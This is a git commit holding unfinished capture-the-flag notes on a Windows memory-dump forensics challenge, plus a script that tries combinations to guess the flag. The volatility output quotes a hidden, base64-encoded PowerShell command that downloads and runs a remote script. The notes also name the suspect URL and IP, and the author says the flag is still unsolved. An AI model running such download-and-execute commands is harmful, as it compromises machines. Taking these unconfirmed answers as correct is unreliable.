add ongoing work

2021-12-03 17:22:51 +01:00
parent 3a7fe25974
commit 07bdcd4f73
2 changed files with 122 additions and 13 deletions
--- a/forensics/honeypot/README.md
+++ b/forensics/honeypot/README.md
@@ -0,0 +1,105 @@
 # Honeypot
 Santa really encourages people to be at his good list but sometimes he is a bit
 naughty himself. He is using a Windows 7 honeypot to capture any suspicious
 action. Since he is not a forensics expert, can you help him identify any
 indications of compromise?
 1. Find the full URL used to download the malware.
 2. Find the malicious's process ID.
 3. Find the attackers IP
 Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
 Download Link: http://46.101.25.140/forensics_honeypot.zip
 ## Flag
 ## Progress so far
 - The honeypot.zip file contains ä windows memory dump
 - By using the `volatility3` framework one can extract data from the dump
 - By checking `vol -f honeypot.raw windows.cmdline.CMDLine` the malicious process is quite obvious
 ```bash
 cat win_cmdline
 ... snip ...
 3504  VBoxTray.exe  "C:\Windows\System32\VBoxTray.exe"
 3112  WmiPrvSE.exe  C:\Windows\system32\wbem\wmiprvse.exe
 3324  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
 3344  iexplore.exe  "C:\Program Files\Internet Explorer\iexplore.exe"
 SCODEF:3324 CREDAT:14337
 2700  powershell.exe
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e
 aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
 3732  conhost.exe \??\C:\Windows\system32\conhost.exe
 "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
 4028  whoami.exe  Required memory at 0x7ffdf010 is not valid (process exited?)
 4036  HOSTNAME.EXE  Required memory at 0x7ffd7010 is not valid (process
 exited?)
 2924  DumpIt.exe  "C:\Users\Santa\Desktop\DumpIt.exe"
 2920  conhost.exe \??\C:\Windows\system32\conhost.exe
 "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
 168 dllhost.exe C:\Windows\system32\DllHost.exe
 /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 ```
 - The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url
 - The PID of said command is 2700
 - By examining the currently active connections, using `vol -f honeypot.raw windows.netscan.Netscan` the following foreign IPs stand out:
 ```
 Volatility 3 Framework 1.0.1
 Offset    Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner
 Created
 0x2554b460  TCPv4 10.0.2.15 49226   93.184.220.29 80  ESTABLISHED - - -
 0x261e9d30  TCPv4 10.0.2.15 49228   172.67.177.22 443 ESTABLISHED - - -
 0x3e2e9cc0  TCPv4 10.0.2.15 49221   212.205.126.106 443 ESTABLISHED - - -
 0x3ee98d80  TCPv4 10.0.2.15 49229   147.182.172.189 4444  ESTABLISHED - - -
 0x3f1b0df8  TCPv4 10.0.2.15 49216   212.205.126.106 443 ESTABLISHED - - -
 0x3f225df8  TCPv4 10.0.2.15 49222   212.205.126.106 443 ESTABLISHED - - -
 0x3f547008  TCPv4 10.0.2.15 49220   212.205.126.106 443 ESTABLISHED - - -
 0x3f561438  TCPv4 10.0.2.15 49215   204.79.197.203  443 ESTABLISHED - - -
 0x3f57c438  TCPv4 10.0.2.15 49218   95.100.210.141  443 ESTABLISHED - - -
 0x3f58b4c8  TCPv4 10.0.2.15 49217   212.205.126.106 443 ESTABLISHED - - -
 0x3f58c748  TCPv4 10.0.2.15 49223   212.205.126.106 443 ESTABLISHED - - -
 0x3f58e9d8  TCPv4 10.0.2.15 49225   172.67.177.22 443 ESTABLISHED - - -
 0x3f5c6df8  TCPv4 10.0.2.15 49219   95.100.210.141  443 ESTABLISHED - - -
 ```
 - By eliminating all the ips which belong to M$ we end up with a small set of 5 ips.
 - To generate the flag the follwing shell script was used, sadly with no success.
 - I'm unsure about the `... | md5sum` part as this adds a hyphen...
 ```cat generate_flags.sh
 #!/bin/bash
 list=(
  147.182.172.189 # digital ocean
  #172.67.177.22 # cloudflare net
  #212.205.126.106 # greece
  #93.184.220.29 # edgecast
  #95.100.210.141 # akamai
 )
 pids=(
  1556 # explorer
  2460 # SearchFilterHo
  2856 # explorer
  3324 # iexplorer
  3344 # iexplorer
 )
 for ip in ${list[@]}; do
  for pid in ${pids[@]}; do
    echo Generating Flag for $ip and $pid:
    echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
    echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
  done
 done
 ```
 - I don't know, maybe the challenge is borked somehow?
--- a/forensics/honeypot/generate_flags.sh
+++ b/forensics/honeypot/generate_flags.sh
@@ -1,21 +1,25 @@
 #!/bin/bash
 list=(
-  10.0.2.15
+  147.182.172.189 # digital ocean
-  127.0.0.1
+  #172.67.177.22 # cloudflare net
-  65.55.44.109
+  #212.205.126.106 # greece
-  147.182.172.189
+  #93.184.220.29 # edgecast
-  172.67.177.22
+  #95.100.210.141 # akamai
  204.79.197.203
  212.205.126.106
  93.184.220.29
  95.100.210.141
 )
 pids=(
  1556 # explorer
  2460 # SearchFilterHo
  2856 # explorer
  3324 # iexplorer
  3344 # iexplorer
 )
 for ip in ${list[@]}; do
-  echo Generating Flag from $ip:
+  for pid in ${pids[@]}; do
-  echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}"
+    echo Generating Flag for $ip and $pid:
-  echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}"
+    echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
    echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
  done
 done